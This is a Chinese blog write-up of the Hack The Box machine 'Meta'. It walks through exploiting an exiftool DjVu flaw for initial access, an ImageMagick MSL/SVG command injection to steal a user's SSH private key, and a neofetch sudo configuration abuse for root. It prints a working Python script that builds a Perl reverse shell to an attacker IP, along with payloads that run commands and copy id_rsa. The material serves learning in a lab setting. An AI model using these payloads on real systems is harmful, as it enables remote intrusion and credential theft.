Meta靶机

最新推荐文章于 2023-10-08 15:16:28 发布
最新推荐文章于 2023-10-08 15:16:28 发布
阅读量1.5k 收藏
点赞数
分类专栏: hack the box 文章标签: 渗透测试 hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/123156600
版权

信息收集

发现目标主机只开放了ssh和web服务
在这里插入图片描述
当我们访问web主页时,发现只是一个很普通的apache搭建的页面
在这里插入图片描述
目录扫描貌似好像也没发现什么有价值的信息
在这里插入图片描述
什么发现也没有,当我们扫描子域名时,发现了一个子域
在这里插入图片描述
当我们访问这个子域时,发现是一个文件上传的点。经过反复测试,初步断定它对上传内容进行了仔细的检查,任何不符合图片特征的文件都会被过滤掉
在这里插入图片描述
那我们尝试上传一张正常的图片试试,这个格式是否很眼熟?对的,这是exiftool工具的输出格式
在这里插入图片描述
在这里插入图片描述

漏洞利用

说实话这里是我自己本人没想到,可能是我自己的经验不太够吧。这里我们要找的是exiftool对应的漏洞,对的没想到吧,我也是参考了别人的意见才知道的。这里已经披露出了对应的漏洞编号了
在这里插入图片描述
我选择了第二个网址上的漏洞利用脚本,因为上面那个依赖问题太复杂了。首先我们先生成一个图片马文件,将脚本文件的IP和监听端口改成我们对应的IP和端口

#!/bin/env python3

import base64
import subprocess

ip = '10.10.14.60'
port = '4444'

payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"


payload = payload + base64.b64encode( f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({port},inet_aton('{ip}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};".encode() )

payload = payload + b"'))};\")"


payload_file = open('payload', 'w')
payload_file.write(payload.decode('utf-8'))
payload_file.close()


subprocess.run(['bzz', 'payload', 'payload.bzz'])
subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])
subprocess.run(['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])

在这里插入图片描述
上传image.jpg木马图片后,我们得到了www-data用户的权限
在这里插入图片描述
但是当我们进入thomas用户的.ssh目录时,发现没有权限,并且user.txt文件也没有权限查看
在这里插入图片描述
查看主机的内核版本,发现是64位的Linux主机
在这里插入图片描述
我们可以尝试上传pspy64这个脚本进行探测,pspy 是一个命令行工具,旨在侦听进程而无需 root 权限。它允许您在执行时查看其他用户、cron 作业等运行的命令。发现了一个convert_images.sh脚本
在这里插入图片描述
我们查看一下这个脚本的内容,发现它是先进入到对应的目录中,然后再运行mogrify这个程序将发现的文件转换为png文件,最后杀死这个进程。
在这里插入图片描述
我们可以查看一下mogrify这个程序的版本,发现是7.0.10-36
在这里插入图片描述
在网上搜索到对应的漏洞编号是CVE-2016-3714
在这里插入图片描述
利用的方法是上传一个poc.svg文件到/dev/shm目录下,并将poc.svg文件复制到/var/www/dev01.artcorp.htb/convert_images/这个目录下,经过一段时间后会生成一个0wned文件,输出了用户名证明文件成功执行了包含的命令

<image authenticate='ff" `echo $(id)> /dev/shm/0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

在这里插入图片描述
那我们修改一下poc.svg里面的内容,尝试将thomas账户的密钥文件读取出来

<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

成功读取密钥信息,我们可以开启一个http服务将id_rsa文件下载下来
在这里插入图片描述
重新编排一下顺序后,可以成功连接到thomas用户
在这里插入图片描述

提权到ROOT

我们输入sudo -l命令,发现一个neofetch程序可以以root身份运行
在这里插入图片描述
我们尝试运行这个程序,输出是linux内核的基本信息
在这里插入图片描述
既然这个程序可以利用,那么我们可以进入这个程序的配置文件中,更改其配置文件信息达到我们提权的目的。我们更改/home/thomas/.config/neofetch这个目录下的config.conf文件
在这里插入图片描述
因为我们使用neofetch程序提权的时候,会保留XDG_CONFIG_HOME的环境变量,所以我们要将thomas.config导出到基本配置环境路径
在这里插入图片描述
得到root权限
在这里插入图片描述

总结

总的来说,这个靶机还是相当有难度的。我后面提权部分基本也是照着别人的建议来做,真的实在是太难了。提权和漏洞利用的方法都是在红队攻防实战中非常常见的,能掌握对技术提升方面很有帮助。

平凡的学者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
pspy:在没有root权限的情况下监视linux进程
03-31
pspy-无特权Linux进程监听 pspy是一种命令行工具,旨在无需根权限就可以窥探进程。 它允许您在其他用户执行命令时查看它们,cron作业等。 非常适合枚举CTF中Linux系统。 很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。 该工具从procfs扫描中收集信息。 放置在文件系统选定部分上的Inotify观察程序将触发这些扫描,以捕获短暂的进程。 入门 下载 将工具安装到要检查Linux机器上。 首先获取二进制文件。 在此处下载发布的二进制文件: 32位大,静态版本: pspy32 64位大,静态版本: pspy64 32位小版本: pspy32s 64位小版本: pspy64s 静态编译的文件应可在任何Linux系统上使用,但容量很大(〜4MB)。 如果有大小问题,请尝试较小的版本,该版本取决于libc并使用UPX(〜1MB)压缩。 建造 您可以使用系
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5453
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Linux系统监控工具详解
3369的博客
09-26 475
系统监控: proc文件系统: proc文件系统是一种无存储的文件系统,当读其中的文件时,其内容动态生成,当写文件时,文件所关联的写函数被调用。每个proc文件都关联着字节特定的读写函数,因而它提供了另外的一种和内核通信的机制:内核部件可以通过该文件系统向用户空间提供接口来提供查询信息、修改软件行为,因而它是一种比较重要的特殊文件系统 由于proc文件系统以文件的形式向用户空间提供了访问接口,这些接口可以用于在运行时获取相关部件的信息或者修改部件的行为,因而它是非常方便的一个接口。内核中大量使用了该文件系统
djinn3 vulnhub 靶机渗透
mrwangtw的博客
01-21 3127
靶机ip10.0.2.45,攻击机ip10.0.2.4 扫描靶机端口 进入80端口,没发现什么可用的信息 进入5000端口,这里查看所有的title内容,没发现什么可用的信息,看了大佬的博客,发现可用的用户guest 访问31337端口,发现 考虑有nc命令访问端口,发现可用guest去登录,密码也是guest 这里发现这里增加和删除的ticket就是5000端口的内容 反复测试发现存在ssti漏洞 这里是判断ssti模板引擎的方法,具体内容在这...
谈谈linux中那些非常规提权及其应用场景
阿道夫的博客
03-07 514
*提权原理:**本质上还是linux环境变量提权的那个原理,我之所以把这个提权案例拿过来,是因为我认为发现和分析用户自定义文件的这个过程及其思想是有价值的。环境变量提权的原理我之前写过一篇文章,感兴趣的师傅可以去看看,链接如下:https://www.freebuf.com/articles/system/320593.html通过常规的信息搜集,我发现内核提权和常规的sudo等提权手段都不可行,但是在使用以下命令的时候,发现了listinfo。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
PWN靶机环境 网络安全
05-23
PWN靶机环境
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
文件上传漏洞靶场-OSCP系列靶场过程
最新发布
zkaqlaoniao的博客
10-08 388
当没有思路的时候,可以上传pspy64来尝试发现root下运行的进程没看够~?欢迎关注!
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
weixin_62621015的博客
04-03 487
Grotesque:3.0.1 vulnhub靶场(papy64,linpeas.sh)
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-5
Aluxian_的博客
06-21 1587
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-5,662/ 前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:https://blog.csdn.net/Alu
Funbox10靶机详解
weixin_44681307的博客
07-21 269
执行后发现拿到一个shell,但是这个shell权限很低,命令都不能用,就像做一个反弹shell。我wget能下载文件的原因是我在kali上开启了apache2服务,常用文件放一起就好了。我们进去这个目录看看,cat一下发现点线索,一看这就是一个base64编码的。最难的就是反弹shell,学会了一些新的反弹shell命令。文件,里面有一个jack用户的账号密码,su一下就登陆上了。进去后发现有点像一个CMS,就去搜索了一下有没有漏洞。这个靶机扫描ip并没有什么有用的东西,就不展示了。
看完这篇 教你玩转渗透测试靶机——Metasploitable2
m0_67401746的博客
03-18 7553
Metasploitable2渗透测试详解 Metasploitable2靶机介绍: Metasploitable2靶机下载: Metasploitable2靶机安装: Metasploitable2靶机漏洞详解: Metasploitable2靶机渗透总结: Metasploitable2靶机介绍: Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msf
metasploitable2 渗透测试靶机 1
m0_73910867的博客
10-11 1731
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。这个版本的虚拟系统兼容VMware。当虚拟系统启动之后,使用用户名:msfadmin 和密码msfadmin登陆 适用于学习网络安全。
VulnHub靶场----grotesque3
qq_61670993的博客
10-19 450
本人小菜鸡,希望一起学习进步!
靶机渗透练习05-driftingblues5
Force~
03-29 2185
靶机地址: https://www.vulnhub.com/entry/driftingblues-5,662/ 1、主机探活 arp-scan -I eth0 -l (指定网卡扫) 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) masscan 192.168.111.0/24 -p 80,22 (masscan 扫描的网段 -p 扫描端口号) netdiscover -i eth0 -r 192.168.184.0/24 (netdiscover -i 网卡-r 网段) nmap -s.
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
DdddddXxxxx的博客
05-06 1187
渗透 | 靶机Aragog-1.0.2本地定时执行脚本提权到root
doubletrouble靶机
08-29
doubletrouble靶机是一个用于渗透测试和漏洞挖掘的目标。它有两个不同的靶机地址。第一个地址是https://download.vulnhub.com/doubletrouble/doubletrouble.ova,可以下载一个ova文件来部署虚拟机。第二个地址是https://www.vulnhub.com/entry/doubletrouble-1,743/,可以获取更多有关靶机的描述信息。靶机中包含一个名为"doubletrouble"的数据库,其中有一个名为"users"的表。你可以使用sqlmap等工具对该表进行爆破和数据挖掘操作。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶场-DoubleTrouble](https://blog.csdn.net/qq_42947816/article/details/125739402)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [靶机渗透练习63-doubletrouble](https://blog.csdn.net/Perpetual_Blue/article/details/124289479)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值